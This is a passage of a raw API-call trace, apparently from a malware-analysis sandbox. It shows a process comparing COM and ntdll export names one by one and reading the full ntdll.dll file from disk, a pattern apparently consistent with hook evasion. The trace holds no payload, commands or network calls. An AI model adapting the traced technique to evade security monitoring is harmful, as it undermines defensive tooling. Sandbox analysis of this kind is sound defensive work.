lpString2="CheckInitDde") returned 0 [0202.361] lstrcmpA (lpString1="CleanROTForApartment", lpString2="BindMoniker") returned 1 [0202.361] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree") returned -1 [0202.361] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree64") returned -1 [0202.361] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0202.362] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0202.362] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0202.362] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0202.362] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize") returned -1 [0202.362] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize64") returned -1 [0202.362] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0202.362] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0202.362] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0202.362] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0202.362] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromOle1Class") returned -1 [0202.362] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgID") returned -1 [0202.362] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgIDEx") returned -1 [0202.362] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromString") returned -1 [0202.362] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0202.362] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0202.362] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0202.362] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0202.362] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0202.362] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0202.362] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0202.362] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0202.363] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0202.363] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Connect") returned -1 [0202.363] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0202.363] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0202.363] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0202.363] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CheckInitDde") returned 1 [0202.363] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CleanROTForApartment") returned 0 [0202.363] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="BindMoniker") returned 1 [0202.363] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree") returned -1 [0202.363] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree64") returned -1 [0202.363] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0202.363] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0202.363] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0202.363] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0202.363] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize") returned -1 [0202.363] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize64") returned -1 [0202.363] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0202.363] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0202.363] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0202.363] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0202.364] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromOle1Class") returned -1 [0202.364] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgID") returned -1 [0202.364] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgIDEx") returned -1 [0202.364] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromString") returned -1 [0202.364] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0202.364] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0202.364] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0202.364] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0202.364] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0202.364] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0202.364] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0202.364] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0202.364] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0202.364] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Connect") returned -1 [0202.364] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0202.364] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0202.364] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0202.364] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CheckInitDde") returned 1 [0202.364] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CleanROTForApartment") returned 1 [0202.364] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="ClipboardProcessUninitialize") returned 0 [0202.365] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="BindMoniker") returned 1 [0202.365] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree") returned 1 [0202.365] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree64") returned 1 [0202.365] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0202.365] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0202.365] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0202.365] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0202.365] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize") returned 1 [0202.365] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize64") returned 1 [0202.365] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0202.365] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0202.365] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0202.365] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0202.365] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromOle1Class") returned 1 [0202.365] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgID") returned 1 [0202.365] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgIDEx") returned 1 [0202.365] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromString") returned 1 [0202.365] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0202.365] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0202.365] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0202.365] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0202.366] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0202.366] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0202.366] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0202.366] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0202.366] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0202.366] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Connect") returned -1 [0202.366] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0202.367] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0202.367] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0202.367] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CheckInitDde") returned 1 [0202.367] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CleanROTForApartment") returned 1 [0202.367] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="ClipboardProcessUninitialize") returned 1 [0202.367] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAddRefServerProcess") returned 1 [0202.367] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAicGetTokenForCOM") returned 0 [0202.368] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="BindMoniker") returned 1 [0202.368] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree") returned 1 [0202.368] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree64") returned 1 [0202.368] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0202.368] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0202.368] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0202.368] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0202.368] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize") returned 1 [0202.368] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize64") returned 1 [0202.368] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0202.368] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0202.368] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0202.368] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0202.368] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromOle1Class") returned 1 [0202.368] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgID") returned 1 [0202.368] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgIDEx") returned 1 [0202.368] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromString") returned 1 [0202.368] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0202.368] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0202.368] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0202.368] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0202.369] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0202.369] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0202.369] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0202.369] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0202.369] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0202.369] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Connect") returned -1 [0202.369] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0202.369] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0202.369] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0202.369] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CheckInitDde") returned 1 [0202.369] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CleanROTForApartment") returned 1 [0202.370] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="ClipboardProcessUninitialize") returned 1 [0202.370] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAddRefServerProcess") returned 1 [0202.370] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAicGetTokenForCOM") returned 1 [0202.370] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAllowSetForegroundWindow") returned 0 [0202.370] lstrcmpA (lpString1="CoBuildVersion", lpString2="BindMoniker") returned 1 [0202.370] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree") returned 1 [0202.370] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree64") returned 1 [0202.370] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0202.370] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0202.370] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0202.370] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0202.370] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize") returned 1 [0202.370] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize64") returned 1 [0202.370] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0202.371] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0202.371] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0202.371] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0202.371] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromOle1Class") returned 1 [0202.371] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgID") returned 1 [0202.371] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgIDEx") returned 1 [0202.371] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromString") returned 1 [0202.371] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0202.371] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0202.371] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0202.371] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0202.371] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0202.371] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0202.371] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0202.371] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0202.371] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0202.371] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Connect") returned -1 [0202.371] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0202.371] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0202.371] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0202.371] lstrcmpA (lpString1="CoBuildVersion", lpString2="CheckInitDde") returned 1 [0202.639] GetProcessHeap () returned 0x570000 [0202.639] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4105040 | out: hHeap=0x570000) returned 1 [0202.645] GetProcessHeap () returned 0x570000 [0202.645] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5891a0 [0202.645] LoadLibraryA (lpLibFileName="Ntdll.dll") returned 0x7ffc5f810000 [0202.645] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0202.645] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0202.646] GetModuleFileNameA (in: hModule=0x7ffc5f810000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0202.646] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0202.647] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0202.647] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0202.647] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1817160) returned 1 [0202.647] GetProcessHeap () returned 0x570000 [0202.647] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1bba48) returned 0x4108040 [0202.652] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0202.653] ReadFile (in: hFile=0x140, lpBuffer=0x4108040, nNumberOfBytesToRead=0x1bba48, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4108040*, lpNumberOfBytesRead=0x14f5a4*=0x1bba48, lpOverlapped=0x0) returned 1 [0203.251] CloseHandle (hObject=0x140) returned 1 [0203.251] lstrcmpA (lpString1="A_SHAFinal", lpString2="A_SHAFinal") returned 0 [0203.251] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAFinal") returned 1 [0203.252] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAInit") returned 0 [0203.252] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAFinal") returned 1 [0203.252] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAInit") returned 1 [0203.252] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAUpdate") returned 0 [0203.252] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAFinal") returned 1 [0203.252] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAInit") returned 1 [0203.252] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAUpdate") returned 1 [0203.252] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 0 [0203.253] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAFinal") returned 1 [0203.253] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAInit") returned 1 [0203.253] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAUpdate") returned 1 [0203.253] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0203.253] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcFreeCompletionListMessage") returned 0 [0203.253] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAFinal") returned 1 [0203.253] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAInit") returned 1 [0203.253] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAUpdate") returned 1 [0203.253] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0203.253] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcFreeCompletionListMessage") returned 1 [0203.253] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcGetCompletionListLastMessageInformation") returned 0 [0203.254] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAFinal") returned 1 [0203.254] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAInit") returned 1 [0203.254] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAUpdate") returned 1 [0203.254] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0203.254] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcFreeCompletionListMessage") returned 1 [0203.254] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0203.254] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListMessageAttributes") returned 0 [0203.254] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAFinal") returned 1 [0203.254] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAInit") returned 1 [0203.254] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAUpdate") returned 1 [0203.254] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0203.254] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcFreeCompletionListMessage") returned 1 [0203.254] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0203.254] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0203.254] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetHeaderSize") returned 0 [0203.254] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAFinal") returned 1 [0203.254] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAInit") returned 1 [0203.254] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0203.254] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0203.254] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0203.254] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0203.255] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0203.255] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0203.255] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 0 [0203.255] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAFinal") returned 1 [0203.255] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAInit") returned 1 [0203.255] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAUpdate") returned 1 [0203.255] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0203.255] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0203.255] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0203.255] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0203.255] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0203.255] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0203.255] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 0 [0203.255] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAFinal") returned 1 [0203.255] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAInit") returned 1 [0203.255] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAUpdate") returned 1 [0203.255] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0203.255] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcFreeCompletionListMessage") returned 1 [0203.256] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0203.256] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0203.256] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetHeaderSize") returned 1 [0203.256] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageAttribute") returned 1 [0203.256] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0203.256] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 0 [0203.256] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAFinal") returned 1 [0203.256] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAInit") returned 1 [0203.256] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0203.256] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0203.256] lstrcmpA 